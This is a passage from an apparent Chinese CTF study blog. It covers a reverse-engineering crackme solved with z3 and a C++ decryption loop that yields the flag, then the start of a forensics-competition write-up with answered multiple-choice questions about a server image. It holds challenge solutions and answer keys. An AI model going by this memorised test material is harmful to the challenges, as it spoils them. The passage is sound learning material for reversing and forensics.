__isoc99_scanf(<span class="string">"%d"</span>, a2);</span><br><span class="line"> }</span><br><span class="line"> v7[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">2</span>; ++j )</span><br><span class="line"> {</span><br><span class="line"> dword_601078 = v6[j];</span><br><span class="line"> dword_60107C = HIDWORD(v6[j]);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)&unk_601060;</span><br><span class="line"> sub_400686(&dword_601078, &unk_601060);</span><br><span class="line"> LODWORD(v7[j]) = dword_601078;</span><br><span class="line"> HIDWORD(v7[j]) = dword_60107C;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)sub_400770(v7, a2) != <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Do not forget to change input to hex and combine~\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}<span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line"> <span class="keyword">signed</span> <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line"> __int64 input[<span class="number">5</span>]; <span class="comment">// [rsp+10h] [rbp-60h]</span></span><br><span class="line"> __int64 flag_enc[<span class="number">5</span>]; <span class="comment">// [rsp+40h] [rbp-30h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> __int64 v8; <span class="comment">// [rsp+68h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line"> v8 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line"> input[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> input[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> input[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> input[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> input[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)i);</span><br><span class="line"> __isoc99_scanf(<span class="string">"%d"</span>, (<span class="keyword">char</span> *)input + <span class="number">4</span> * i);</span><br><span class="line"> }</span><br><span class="line"> flag_enc[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> flag_enc[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> flag_enc[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> flag_enc[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> flag_enc[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">2</span>; ++j )</span><br><span class="line"> {</span><br><span class="line"> tmp_0_ = input[j];</span><br><span class="line"> tmp_1_ = *((_DWORD *)input + j * <span class="number">2</span> + <span class="number">1</span>); </span><br><span class="line"> <span class="comment">//这里的tmp_0和tmp_1本身以为是两个毫不相干的变量,但是在后面的change函数那里,因为传入的是指针,所以发现对tmp_1也进行了处理,所以这里应该处理成为一个数组</span></span><br><span class="line"> change((<span class="keyword">unsigned</span> <span class="keyword">int</span> *)&tmp_0_, &table);</span><br><span class="line"> LODWORD(flag_enc[j]) = tmp_0_;</span><br><span class="line"> *((_DWORD *)flag_enc + j * <span class="number">2</span> + <span class="number">1</span>) = tmp_1_;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)check(flag_enc) != <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Do not forget to change input to hex and combine~\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>思路比较清晰,输入以后<code>change</code>函数处理,<code>check</code>函数比较,出结果。</p><p>我们先来看看<code>check</code>函数,美化:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> __int64 __fastcall <span class="title">check</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">signed</span> __int64 result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ( a1[<span class="number">2</span>] - a1[<span class="number">3</span>] != <span class="number">0x84A236FF</span>LL || a1[<span class="number">3</span>] + a1[<span class="number">4</span>] != <span class="number">0xFA6CB703</span>LL || a1[<span class="number">2</span>] - a1[<span class="number">4</span>] != <span class="number">0x42D731A8</span>LL )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line"> result = <span class="number">0LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> ( *a1 != <span class="number">0xDF48EF7E</span> || a1[<span class="number">5</span>] != <span class="number">0x84F30420</span> || a1[<span class="number">1</span>] != <span class="number">0x20CAACF4</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line"> result = <span class="number">0LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"good!"</span>);</span><br><span class="line"> result = <span class="number">1LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>根据提示,<code>z3</code>解方程:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line">s=Solver()</span><br><span class="line">x0 = Int(<span class="string">'x0'</span>)</span><br><span class="line">x1 = Int(<span class="string">'x1'</span>)</span><br><span class="line">x2 = Int(<span class="string">'x2'</span>)</span><br><span class="line">x3 = Int(<span class="string">'x3'</span>)</span><br><span class="line">x4 = Int(<span class="string">'x4'</span>)</span><br><span class="line">x5 = Int(<span class="string">'x5'</span>)</span><br><span class="line">s.add(x0==<span class="number">0xDF48EF7E</span>)</span><br><span class="line">s.add(x5==<span class="number">0x84F30420</span>)</span><br><span class="line">s.add(x1==<span class="number">0x20CAACF4</span>)</span><br><span class="line">s.add(x2-x3==<span class="number">0x84A236FF</span>)</span><br><span class="line">s.add(x3+x4==<span class="number">0xFA6CB703</span>)</span><br><span class="line">s.add(x2-x4==<span class="number">0x42D731A8</span>)</span><br><span class="line"><span class="keyword">if</span> s.check() == sat:</span><br><span class="line">m = s.model()</span><br><span class="line">print(m)</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">[x2 = 3774025685,</span></span><br><span class="line"><span class="string"> x3 = 1548802262,</span></span><br><span class="line"><span class="string"> x4 = 2652626477,</span></span><br><span class="line"><span class="string"> x1 = 550153460,</span></span><br><span class="line"><span class="string"> x5 = 2230518816,</span></span><br><span class="line"><span class="string"> x0 = 3746099070]</span></span><br><span class="line"><span class="string"> '''</span></span><br></pre></td></tr></table></figure><p>那么相当于知道了<code>flag_enc</code>,再看<code>change</code>函数:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">change</span><span class="params">(<span class="keyword">unsigned</span> <span class="keyword">int</span> *ini, _DWORD *tables)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 result; <span class="comment">// rax</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var; <span class="comment">// [rsp+1Ch] [rbp-24h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var_1; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line"> <span class="keyword">int</span> tmp; <span class="comment">// [rsp+24h] [rbp-1Ch]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> i; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line"> var = *ini;</span><br><span class="line"> var_1 = ini[<span class="number">1</span>];</span><br><span class="line"> tmp = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">63</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> tmp += <span class="number">0x458BCD42</span>;</span><br><span class="line"> var += (var_1 + tmp + <span class="number">11</span>) ^ ((var_1 << <span class="number">6</span>) + *tables) ^ ((var_1 >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line"> var_1 += (var + tmp + <span class="number">20</span>) ^ ((var << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var >> <span class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line"> }</span><br><span class="line"> *ini = var;</span><br><span class="line"> result = var_1;</span><br><span class="line"> ini[<span class="number">1</span>] = var_1;</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>对<code>change</code>函数的三行关键代码进行分析,发现<code>var_1</code>的处理只与此时<code>var</code>的值有关,其余都是常量;<code>var</code>的处理只与此时<code>var_1</code>值有关,其余都是常量。所以直接把加号变成减号就<code>ok</code>了。</p><p>然后还有一点需要注意的就是在<code>IDA</code>里面你的数据数据类型是什么,你在写<code>exp</code>的时候数据就用什么数据类型,否则可能会出锅。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> flag_enc[<span class="number">5</span>],flag[<span class="number">5</span>];</span><br><span class="line">flag_enc[<span class="number">0</span>]=<span class="number">3746099070</span>;flag_enc[<span class="number">1</span>]=<span class="number">550153460</span>;flag_enc[<span class="number">2</span>]=<span class="number">3774025685</span>;flag_enc[<span class="number">3</span>]=<span class="number">1548802262</span>;flag_enc[<span class="number">4</span>]=<span class="number">2652626477</span>;flag_enc[<span class="number">5</span>]=<span class="number">2230518816</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> var[<span class="number">3</span>];</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> tables[<span class="number">4</span>]={<span class="number">2</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>};</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">5</span>;i+=<span class="number">2</span>){</span><br><span class="line"><span class="keyword">int</span> tmp = <span class="number">0x458BCD42</span>*<span class="number">64</span>;</span><br><span class="line">var[<span class="number">0</span>]=flag_enc[i];</span><br><span class="line">var[<span class="number">1</span>]=flag_enc[i+<span class="number">1</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;j<=<span class="number">0x3F</span>;j++){</span><br><span class="line">var[<span class="number">1</span>] -= (var[<span class="number">0</span>] + tmp + <span class="number">20</span>) ^ ((var[<span class="number">0</span>] << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var[<span class="number">0</span>] >> <span class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line">var[<span class="number">0</span>] -= (var[<span class="number">1</span>] + tmp + <span class="number">11</span>) ^ ((var[<span class="number">1</span>] << <span class="number">6</span>) + tables[<span class="number">0</span>]) ^ ((var[<span class="number">1</span>] >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line">tmp-=<span class="number">0x458BCD42</span>;</span><br><span class="line">}</span><br><span class="line">flag[i]=var[<span class="number">0</span>];</span><br><span class="line">flag[i+<span class="number">1</span>]=var[<span class="number">1</span>];</span><br><span class="line">}</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">6</span>;i++)</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"0x%x\n"</span>,flag[i]);</span><br><span class="line">}</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">0x666c61</span></span><br><span class="line"><span class="comment">0x677b72</span></span><br><span class="line"><span class="comment">0x655f69</span></span><br><span class="line"><span class="comment">0x735f67</span></span><br><span class="line"><span class="comment">0x726561</span></span><br><span class="line"><span class="comment">0x74217d</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>再用<code>sublime</code>处理一下,用<code>python</code>稍微跑一下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">flag=[<span class="number">0x66</span>,<span class="number">0x6c</span>,<span class="number">0x61</span>,<span class="number">0x67</span>,<span class="number">0x7b</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x5f</span>,<span class="number">0x69</span>,<span class="number">0x73</span>,<span class="number">0x5f</span>,<span class="number">0x67</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x61</span>,<span class="number">0x74</span>,<span class="number">0x21</span>,<span class="number">0x7d</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line">print(<span class="built_in">chr</span>(i),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment"># flag{re_is_great!}</span></span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>第一届长安杯电子取证竞赛</title>
<link href="2021/02/21/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B%E9%A2%98%E8%A7%A3/"/>
<url>2021/02/21/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B%E9%A2%98%E8%A7%A3/</url>
<content type="html"><![CDATA[<blockquote><p><strong>案情简介</strong></p><p>在一起电诈案件中,受害者称自己的银行卡被他人冒用,曾收到假冒公安的短信,因为自己在一个 P2P 网站中理财,假冒公安称该网站已被列外非法网站,要自己到公安备案网站填写自己的信息,并帮助自己追回本金,因此信以为真,在网站上填写了自己的信息和绑定的银行卡信息;办案机关推测嫌疑人可能是获取了 P2P 网站中的注册用户信息,从而进行定向诈骗,因此调取了 P2P 理财网站的服务器,现委派你对该服务器进行电子数据取证。</p></blockquote><h2 id="Part-1"><a href="#Part-1" class="headerlink" title="Part 1"></a>Part 1</h2><p>你获得该 <code>P2P</code> 理财网站服务器硬盘镜像文件“检材 1.E01”,根据这个镜像文件,回答下列问题:</p><blockquote><ol><li>计算“检材 1.E01”镜像的 SHA256 值是多少( <strong>C</strong> )<br> A. <code>2b20022249e3e5d66d4bbed34ad337be5dd77b313c92dfe929aa56ed71449697</code><br>B. <code>6a574c40548110598bd4c88520d34b37d13b372066737ede3104743f986b7263</code><br>C. <code>5ee0b3809807bf8a39453695c5835cddfd33f65b4f5bee8b5670625291a6bc1c</code><br>D. <code>8495b678da27c64b54f083afefbcf9f83f94c1de133c70c175b4a784551939dd</code></li></ol></blockquote><p> 取证大师加载,右键计算<code>SHA256</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152420222.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152420222.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017152420222"></p><blockquote><ol start="2"><li><p>该服务器的操作系统版本是什么( <strong>D</strong> )<br> A. <code>CentOS release 6.5 (Final)</code><br>B. <code>Ubuntu 16.04.3 LTS</code><br>C. <code>Debian GNU/Linux 7.8 (wheezy)</code><br>D. <code>CentOS Linux release 7.6.1810(Core)</code></p></li><li><p>该服务器内核版本是多少(<strong>A</strong>)</p><p>A. <code>3.10.0-957.el7.x86_64</code></p><p>B. <code>3.2.0-4-amd64</code></p><p>C. <code>4.8.0-52-generic</code></p><p>D. <code>4.10.0-28-generic</code></p></li></ol></blockquote><p> 火眼仿真生成虚拟机,<code>VM</code>打开:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152333820.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152333820.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017152333820"></p><blockquote><ol start="4"><li><p>原服务器存在多少硬盘分区?(<strong>B</strong>)</p><p><code>A.1 B.2 C.3 D.4</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152729625.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152729625.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017152729625"></p><blockquote><ol start="5"><li><p>原服务器中硬盘分区其中含有一个 LVM 逻辑卷的分区,请找出该分区内开始的逻辑区块地址<code>(LBA)</code>。(答案格式: 扇区,<code>Sector</code>)(<strong>C</strong>)</p><p><code>A.0 B.2048 C.2099200 D.4194344</code></p></li></ol></blockquote><p>逻辑区块地址<code>(Logical Block Address, LBA)</code>是描述计算机存储设备上数据所在区块的通用机制,一般用在像硬盘这样的辅助记忆设备。<code>LBA</code>可以意指某个数据区块的地址或是某个地址所指向的数据区块。</p><p>通过查找知道题目所说的分区是:<code>FMP</code>证据文件 -> 展开镜像 -> 选中 分区2 -> 摘要 -> 查看 物理位置:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154251946.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154251946.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017154251946"></p><p>但是这个内存物理地址的单位是字节<code>(Byte)</code>,而一个逻辑区块占用512位,所以要将这个值除以512。</p><p><code>1074790400/512=2099200</code></p><blockquote><ol start="6"><li><p>该 <code>LVM</code> 逻辑卷分区内<code> root</code> 逻辑卷的文件系统是什么?(<strong>D</strong>)</p><p><code>A.NTFS B.EXT4 C.SWAP D.XFS</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154443455.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154443455.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017154443455"></p><blockquote><ol start="7"><li><p>该<code> LVM</code> 逻辑卷分区内 <code>root </code>逻辑卷的物理大小是多少?(单位:<code>byte</code>)(<strong>C</strong>)</p><p> <code>A. 2,147,483,648 B. 2,147,504,128</code> </p><p> <code>C. 18,249,416,704 D. 20,400,046,080</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154833743.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154833743.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017154833743"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155102368.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155102368.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017155102368">与答案<code>C</code>最为接近</p><blockquote><ol start="8"><li><p>请找出该服务器的网站访问端口是什么?(<strong>D</strong>)</p><p><code>A.22 B.25 C.80 D.8091</code></p></li></ol><ol start="9"><li><p>该服务器中运行了 <code>docker </code>应用,在本地有多少 <code>docker </code>镜像?(<strong>B</strong>)</p><p><code>A.10 B.11 C.12 D.13</code></p></li></ol><ol start="15"><li>在运行中的容器节点中,其中一台容器<code> ID</code> 为 <code>15debb1824e6 </code>的容器节点,它运行了什么服务?(<strong>C</strong>)</li></ol><p><code> A. ftp B. ssh C. nginx D. smtp</code></p><ol start="16"><li><p>上题容器节点中,占用了主机的哪个端口?(<strong>C</strong>)</p><p>A.22 B.8091 C.39999 D.未占用端口</p></li></ol><ol start="17"><li><p>该服务器中网站运行在 <code>docker</code> 容器中,其中 <code>web </code>服务使用的是什么应用?(<strong>C</strong>)</p><p><code>A. apache B. tomcat C. nginx D. IIS</code></p></li></ol><ol start="18"><li>上题所述运行 <code>web</code> 服务的容器节点,使用的镜像名称是什么?<code>(格式 REPOSITORY:TAG)</code> (<strong>D</strong>)<br><code>A. apache: latest B. 